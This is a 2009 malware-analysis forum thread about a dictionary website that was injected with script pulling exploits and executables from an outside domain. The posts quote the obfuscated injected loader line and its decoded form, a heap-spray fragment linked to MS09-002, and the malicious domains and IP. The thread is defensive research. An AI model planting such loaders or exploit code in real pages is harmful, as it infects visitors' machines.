Malware Domain List

Malware Related => Malicious Domains => Topic started by: Shawn Jefferson on June 02, 2009, 10:47:13 pm

Title: malicious site
Post by: Shawn Jefferson on June 02, 2009, 10:47:13 pm

Our symantec endpoint protection detected this site today, and had a preliminary look at it and it looks malicious:

http://www.yourdictionary.com/dictionary-articles/german-english-translation.html

loads scripts from www.rbseu.com 91.121.78.143 which then downloads or attempts from many other IPs.

Haven't looked at the files in too much depth from www.rbseu.com yet, but they are:

common.js
lastfunc.htm
m1.js
m2.js
subfunc.js (looks like it downloads a SWF file)

malware may have been removed from the download sites already?

PS. I've downloaded some of swf files that the subfunc.js downloads, but I'm having trouble decompiling them.  I've tried Flare and the HP SWFScan, but neither are working for me.  Any suggestions?

Title: Re: malicious site
Post by: MysteryFCM on June 02, 2009, 11:18:26 pm

One of the payloads is at /style.jpg

I'm running the rest of the code through Malzilla to decode it and find the second payload.

Two other scripts it's got;

/s1.js
/s2.js

/edit

VT results for style.jpg

http://www.virustotal.com/analisis/35d1f712765ee7ac8c1af03187823cf6350951be6605b7606894fcf9b6d3682f-1243985377

Title: Re: malicious site
Post by: Shawn Jefferson on June 02, 2009, 11:39:15 pm

I plugged the m1 and m2 scripts into Malzilla and I think I got the shellcode out... and did a XOR search that found an XOR key of 0xBC.

This URL pops out:

thpt/:w/wwr.sbuec.mot/poj.gp
http://www.rbseu.com/top.jpg

Just verified the MD5's and it's the same file as style.jpg.

Title: Re: malicious site
Post by: MysteryFCM on June 02, 2009, 11:47:12 pm

According to Anubis and VT, top.jpg is the same as style.jpg;

http://anubis.iseclab.org/?action=result&task_id=1fa7eac4cc3407ab4f977479d9c585e86&format=html

/edit

hehe just noticed your mention of it's being the same as style.jpg .....

/edit 2

Sadly, the code I was asking Malzilla to decode, ended up crashing it (twas the mck wrapped code - definately some of the shell code, but couldn't get it to decode safely, and can't risk this machine). Wepawet couldn't deal with it either.

Title: Re: malicious site
Post by: Shawn Jefferson on June 03, 2009, 06:37:11 pm

Hi,

Where did you get the s1 and s2 scripts?  I didn't see them initially.  edit2: found these myself!

How is the site infected?  I didn't see anything on the source code of the page, and am not sure where else to look exactly! :)

edit: Found it!  So simple, and I overlooked it once already.  In the common.js script that loads from the yourdictionary.com site, there is this line:

Code: [Select]

document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,109,111,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));
Malzilla decodes this for me:

Code: [Select]

<SCRIPT LANGUAGE="Javascript" src="http://www.rbseu.com/common.js"></script>
Also, I'd like to decompile the SWF file, but had no luck with either Flare or SWFScan.  Are there other tools that may be able to do it?

It looks like the m1/m2 scripts are triggering the MS09-002 vulnerability.

for(var x=0;x<1000;x++)ruix1.push(document.createElement("i"+"mg"));

Title: Re: malicious site
Post by: MysteryFCM on June 04, 2009, 08:16:47 am

You can use Wepawet to decode the SWF files online. There are a couple of offline tools to do it, but I can't for the life of me remember them atm :(

Title: Re: malicious site
Post by: Shawn Jefferson on June 04, 2009, 03:42:15 pm

Hi,

I found Wepawet (you had mentioned it earlier) and uploaded a couple of the SWF files.  They download menu.jpg which is an executable, but with a different MD5 than the previous ones.

Thanks!
Shawn

Title: Re: malicious site
Post by: MysteryFCM on June 04, 2009, 07:46:22 pm

No problem :)

Title: Re: malicious site
Post by: redwolfe_98 on June 05, 2009, 01:20:59 pm

"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

Title: Re: malicious site
Post by: SysAdMini on June 05, 2009, 01:55:38 pm

Quote from: redwolfe_98 on June 05, 2009, 01:20:59 pm

"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

I don't see any malicious content at rbseu.com.

All urls at this domain return

Code: [Select]

<h1>Bad Request (Invalid Hostname)</h1>

Title: Re: malicious site
Post by: MysteryFCM on June 05, 2009, 02:15:05 pm

Interesting .... seems it's been taken down .... (unusual for OVH to be so fast)

Title: Re: malicious site
Post by: redwolfe_98 on June 05, 2009, 02:29:28 pm

Quote from: SysAdMini on June 05, 2009, 01:55:38 pm

Quote from: redwolfe_98 on June 05, 2009, 01:20:59 pm

"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

I don't see any malicious content at rbseu.com.

All urls at this domain return

Code: [Select]

<h1>Bad Request (Invalid Hostname)</h1>

hey.. i put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink.. according to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com (http://samspade.org/whois/www.rbseu.com)

Title: Re: malicious site
Post by: SysAdMini on June 05, 2009, 02:51:26 pm

Quote from: redwolfe_98 on June 05, 2009, 02:29:28 pm

hey.. i put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink.. according to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com (http://samspade.org/whois/www.rbseu.com)

It's resolving, but there is no content.